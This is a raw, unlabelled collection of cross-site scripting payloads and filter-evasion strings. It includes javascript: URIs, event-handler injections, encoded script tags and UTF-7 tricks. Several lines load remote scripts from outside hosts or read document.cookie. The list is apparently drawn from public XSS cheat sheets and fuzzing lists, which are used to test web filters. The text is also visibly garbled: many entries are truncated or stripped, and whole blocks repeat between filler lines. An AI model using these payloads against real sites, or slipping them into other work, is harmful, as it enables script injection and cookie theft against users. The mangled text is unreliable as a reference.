	&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
	<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
	<div/style="width:expression(confirm(1))">X</div> {IE7}
	<iframe/%00/ src=javaSCRIPT&colon;alert(1)
	//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
	/iframe/src/<iframe/src="<iframe/src=@"/onload=prompt(1) /iframe/src/>
	//\|\\ <script //\|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //\|\\ </script //\|\\
	</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
	<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
	</plaintext\></\|\><plaintext/onmouseover=prompt(1)
	</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
	<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
	<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
	<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
	<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
	<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
	<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
	<var onmouseover="prompt(1)">On Mouse Over</var>
	<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
	<img src="/" =_=" title="onerror='prompt(1)'">
	<%<!--'%><script>alert(1);</script -->
	<script src="data:text/javascript,alert(1)"></script>
	<iframe/src \/\/onload = prompt(1)
	<iframe/onreadystatechange=alert(1)
	<svg/onload=alert(1)
	<input value=<><iframe/src=javascript:confirm(1)
	<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
	http://www.<script>alert(1)</script .com
	<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29>


	<a xlink:href="//jsfiddle.net/t846h/" rel="nofollow noopener" target="_blank">click
	</a>




	--!>

	x
	">
	CLICKME
	<a xlink:href="//jsfiddle.net/t846h/" rel="nofollow noopener" target="_blank">click


	<a rel="nofollow noopener" target="_blank">Click Me</a>

	‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>
	</a>”>



	<
	%253cscript%253ealert(1)%253c/script%253e
	“>alert(document.cookie)
	foo
	ipt>alert(1)ipt>








	<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>







	PT SRC="http://ha.ckers.org/xss.js">
	<
	<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>
	';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
	&search=1
	0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>&submit-frmGoogleWeb=Web+Search
	hellox worldss



	<br><br><br><br><br><br>...<br><br><br><br>
	lol



	">
	">
	">
	">

	<% foo>
	LOL
	LOL

	LOL
	<SCRIPT>alert(/XSS/.source)</SCRIPT>
	\\";alert('XSS');//
	</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
	<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
	<BODY BACKGROUND=\"javascript:alert('XSS')\">
	<BODY ONLOAD=alert('XSS')>
	<IMG DYNSRC=\"javascript:alert('XSS')\">
	<IMG LOWSRC=\"javascript:alert('XSS')\">
	<BGSOUND SRC=\"javascript:alert('XSS');\">
	<BR SIZE=\"&{alert('XSS')}\">
	<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
	<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
	<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
	<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
	<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
	<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
	<XSS STYLE=\"behavior: url(xss.htc);\">
	<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
	<IMG SRC='vbscript:msgbox(\"XSS\")'>
	<IMG SRC=\"mocha:[code]\">
	<IMG SRC=\"livescript:[code]\">
	žscriptualert(EXSSE)ž/scriptu
	<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
	<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
	<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
	<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
	<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
	<TABLE BACKGROUND=\"javascript:alert('XSS')\">
	<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
	<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
	<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
	<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
	<DIV STYLE=\"width: expression(alert('XSS'));\">
	<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
	<IMG STYLE=\"xss:expr/XSS/ession(alert('XSS'))\">
	<XSS STYLE=\"xss:expression(alert('XSS'))\">
	exp/<A STYLE='no\xss:noxss(\"//*\");
	xss:ex/XSS////pression(alert(\"XSS\"))'>
	<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
	<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
	<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
	<!--[if gte IE 4]>
	<SCRIPT>alert('XSS');</SCRIPT>
	<![endif]-->
	<BASE HREF=\"javascript:alert('XSS');//\">
	<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
	<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
	<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
	<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
	a=\"get\";
	b=\"URL(\\"\";
	c=\"javascript:\";
	d=\"alert('XSS');\\")\";
	eval(a+b+c+d);
	<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
	<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
	</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
	<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
	<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
	<XML SRC=\"xsstest.xml\" ID=I></XML>
	<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
	<HTML><BODY>
	<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
	<?import namespace=\"t\" implementation=\"#default#time2\">
	<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
	</BODY></HTML>
	<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
	<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
	<? echo('<SCR)';
	echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
	<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
	Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
	<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
	<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
	<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
	<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
	<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
	<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
	<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
	<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
	<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
	<A HREF=\"http://66.102.7.147/\">XSS</A>
	<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
	<A HREF=\"http://1113982867/\">XSS</A>
	<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
	<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
	<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
	<A HREF=\"//www.google.com/\">XSS</A>
	<A HREF=\"//google\">XSS</A>
	<A HREF=\"http://ha.ckers.org@google\">XSS</A>
	<A HREF=\"http://google:ha.ckers.org\">XSS</A>
	<A HREF=\"http://google.com/\">XSS</A>
	<A HREF=\"http://www.google.com./\">XSS</A>
	<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
	<A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
	<
	%3C
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	<
	\x3c
	\x3C
	\u003c
	\u003C
	<iframe src=http://ha.ckers.org/scriptlet.html>
	<IMG SRC=\"javascript:alert('XSS')\"
	<SCRIPT SRC=//ha.ckers.org/.js>
	<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
	<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
	<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
	<BODY onload!#$%&()*~+-_.,:;?@[/\|\]^`=alert(\"XSS\")>
	<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
	<IMG SRC=\" javascript:alert('XSS');\">
	perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
	perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
	<IMG SRC=\"jav ascript:alert('XSS');\">
	<IMG SRC=\"jav
	ascript:alert('XSS');\">
	<IMG SRC=\"jav ascript:alert('XSS');\">
	<IMG SRC=javascript:alert('XSS')>
	<IMG SRC=javascript:alert('XSS')>
	<IMG SRC=javascript:alert('XSS')>
	<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
	<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
	<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
	<IMG SRC=javascript:alert("XSS")>
	<IMG SRC=JaVaScRiPt:alert('XSS')>
	<IMG SRC=javascript:alert('XSS')>
	<IMG SRC=\"javascript:alert('XSS');\">
	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
	'';!--\"<XSS>=&{()}
	';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>
	'';!--"=&{()}





	">



	<

	\";alert('XSS');//

	¼script¾alert(¢XSS¢)¼/script¾











	exp/*<a rel="nofollow noopener" target="_blank">

	a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);


	PT SRC="http://ha.ckers.org/xss.js">
	TESTHTML5FORMACTION
	crosssitespt






	">
	">
	">



	;1




	+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
	%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
	+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
	%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
	%253cscript%253ealert(document.cookie)%253c/script%253e
	“>alert(document.cookie)
	“>
	“><
	foo
	ipt>alert(document.cookie)ipt>
	%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
	‘; alert(document.cookie); var foo=’
	foo\’; alert(document.cookie);//’;




	">


	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>
	'';!--"=&{()}
	0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"






	<a rel="nofollow noopener" target="_blank">xxs link</a>
	<a rel="nofollow noopener" target="_blank">xxs link</a>
	">
















	<






	<ul><li>XSS<br>




	<br>







	exp/*<a rel="nofollow noopener" target="_blank">

	</a><a class="XSS" rel="nofollow noopener" target="_blank"></a>



	¼script¾alert(¢XSS¢)¼/script¾
















	alert("XSS")'); ?>


	+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-






	PT SRC="http://ha.ckers.org/xss.js">
	<a href="http://66.102.7.147/" rel="nofollow noopener" target="_blank">XSS</a>
	0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"
	veris-->group
	element[attribute='
	[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
	%22;alert%28%27RVRSH3LL_XSS%29//
	javascript:alert%281%29;

	alert;pg("XSS")


	ipt>alert(1)ipt>ipt>alert(1)ipt>
	iPt>alert(1)IPt>
	<a rel="nofollow noopener" target="_blank">test</a>
	%253Cscript%253Ealert('XSS')%253C%252Fscript%253E











































































	"> ">123
	"> 123


	"> 123
	"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)">123
	"> 123
	> Hover the cursor to the LEFT of this Message &ParamHeight=250

	"> ">123
	"> 123



	<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
	<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
	<sVg><scRipt >alert&lpar;1&rpar; {Opera}
	<img/src=`` onerror=this.onerror=confirm(1)
	<form><isindex formaction="javascript&colon;confirm(1)"
	<img src=``&NewLine; onerror=alert(1)&NewLine;
	<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
	<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
	<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
	<script //>//alert(1)//</script //
	&#34;&#62;<h1/onmouseover='\u0061lert(1)'>
	<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
	<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
	<svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script
	<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
	<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
	<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
	<form><a href="javascript:\u0061lert&#x28;1&#x29;">X</script><img//src="worksinchrome&colon;prompt&#x28;1&#x29;"//onerror='eval(src)'>
	<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
	<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
	<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
	http://www.google<script .com>alert(document.location)</script
	<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
	<img/src=@&#32;&#13; onerror = prompt('&#49;')
	<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
	<script ^__^>alert(String.fromCharCode(49))</script ^__^
	</style &#32;><script &#32; :-(>//alert(document.location)//</script &#32; :-(
	&#00;</form><input type&#61;"date" onfocus="alert(1)">
	<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
	<script /*/>//confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')//</script /*/
	<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
	<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
	<script ~~~>alert(0%0)</script ~~~>
	<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
	<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
	<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
	&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
	&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
	<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
	<div/style="width:expression(confirm(1))">X</div> {IE7}
	<iframe// src=javaSCRIPT&colon;alert(1)
	//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
	/iframe/src/<iframe/src="<iframe/src=@"/onload=prompt(1) /iframe/src/>
	//\|\\ <script //\|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //\|\\ </script //\|\\
	</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
	<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
	</plaintext\></\|\><plaintext/onmouseover=prompt(1)
	</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
	<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
	<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
	<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
	<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
	<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
	<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
	<var onmouseover="prompt(1)">On Mouse Over</var>
	<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
	<img src="/" =_=" title="onerror='prompt(1)'">
	<%<!--'%><script>alert(1);</script -->
	<script src="data:text/javascript,alert(1)"></script>
	<iframe/src \/\/onload = prompt(1)
	<iframe/onreadystatechange=alert(1)
	<svg/onload=alert(1)
	<input value=<><iframe/src=javascript:confirm(1)
	<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
	http://www.<script>alert(1)</script .com
	<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29>



	<a xlink:href="//jsfiddle.net/t846h/" rel="nofollow noopener" target="_blank">click
	</a>




	--!>

	x
	">
	CLICKME
	<a xlink:href="//jsfiddle.net/t846h/" rel="nofollow noopener" target="_blank">click


	<a rel="nofollow noopener" target="_blank">Click Me</a>
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	'`"><\x3Cscript>javascript:alert(1)
	'`"><\x00script>javascript:alert(1)
	</a>
































































	\x3Cscript>javascript:alert(1)
	'"`>


	--> -->
	-->
	-->
	-->
	`"'><p></p>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>







	"'`>ABC DEF
	"'`>ABC DEF



	'`"><\x3Cscript>javascript:alert(1)
	'`"><\x00script>javascript:alert(1)
	"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
	"'`><\x00img src=xxx:x onerror=javascript:alert(1)>




	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	javascript:alert(1);
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	ABC DEF
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
